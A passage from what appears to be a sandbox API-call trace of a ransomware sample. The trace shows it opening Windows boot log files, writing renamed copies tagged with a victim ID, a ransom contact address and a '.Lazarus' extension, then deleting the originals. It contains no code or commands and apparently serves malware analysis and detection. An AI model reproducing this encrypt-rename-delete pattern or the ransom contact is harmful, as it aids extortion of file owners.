lpMultiByteStr="C:\\Boot\\BCD.LOG1", lpUsedDefaultChar=0x0) returned 17 [0082.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.368] AreFileApisANSI () returned 1 [0082.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a9c8 [0082.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0082.368] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.368] GetFileType (hFile=0x428) returned 0x1 [0082.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0082.368] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.368] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.369] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.369] CloseHandle (hObject=0x428) returned 1 [0082.369] AreFileApisANSI () returned 1 [0082.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a9c8 [0082.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0082.369] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.369] GetFileType (hFile=0x428) returned 0x1 [0082.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0082.369] CloseHandle (hObject=0x428) returned 1 [0082.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.370] AreFileApisANSI () returned 1 [0082.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ac38 [0082.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0082.370] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0082.370] AreFileApisANSI () returned 1 [0082.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.371] GetLastError () returned 0x0 [0082.371] SetLastError (dwErrCode=0x0) [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0082.371] GetLastError () returned 0x0 [0082.371] SetLastError (dwErrCode=0x0) [0082.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0082.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.371] AreFileApisANSI () returned 1 [0082.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0082.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0082.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 79 [0082.371] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\boot\\bcd.log1.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.372] GetFileType (hFile=0x428) returned 0x1 [0082.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.373] AreFileApisANSI () returned 1 [0082.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a8a8 [0082.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x7a8a8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0082.373] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.373] GetFileType (hFile=0x430) returned 0x1 [0082.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8a8 | out: hHeap=0x20000) returned 1 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.373] GetLastError () returned 0x0 [0082.373] SetLastError (dwErrCode=0x0) [0082.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.373] GetLastError () returned 0x0 [0082.373] SetLastError (dwErrCode=0x0) [0082.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0082.373] ReadFile (in: hFile=0x430, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x0, lpOverlapped=0x0) returned 1 [0082.374] GetLastError () returned 0x0 [0082.374] SetLastError (dwErrCode=0x0) [0082.374] GetLastError () returned 0x0 [0082.374] SetLastError (dwErrCode=0x0) [0082.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.374] CloseHandle (hObject=0x428) returned 1 [0082.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0082.374] CloseHandle (hObject=0x430) returned 1 [0082.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.374] AreFileApisANSI () returned 1 [0082.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a908 [0082.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0082.375] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.375] GetLastError () returned 0x5 [0082.375] GetLastError () returned 0x5 [0082.375] SetLastError (dwErrCode=0x5) [0082.375] GetLastError () returned 0x5 [0082.375] SetLastError (dwErrCode=0x5) [0082.375] GetLastError () returned 0x5 [0082.375] SetLastError (dwErrCode=0x5) [0082.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0082.375] GetLastError () returned 0x5 [0082.375] SetLastError (dwErrCode=0x5) [0082.375] AreFileApisANSI () returned 1 [0082.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a9c8 [0082.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG1") returned 17 [0082.375] DeleteFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1")) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.376] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0082.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.377] AreFileApisANSI () returned 1 [0082.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD.LOG2", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD.LOG2", lpUsedDefaultChar=0x0) returned 17 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.377] AreFileApisANSI () returned 1 [0082.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ab78 [0082.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x7ab78, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0082.378] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.378] GetFileType (hFile=0x430) returned 0x1 [0082.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ab78 | out: hHeap=0x20000) returned 1 [0082.378] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.378] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.378] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.378] CloseHandle (hObject=0x430) returned 1 [0082.378] AreFileApisANSI () returned 1 [0082.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7aae8 [0082.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x7aae8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0082.379] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.379] GetFileType (hFile=0x430) returned 0x1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aae8 | out: hHeap=0x20000) returned 1 [0082.379] CloseHandle (hObject=0x430) returned 1 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.379] HeapFree (in: hHeap=0x20000, 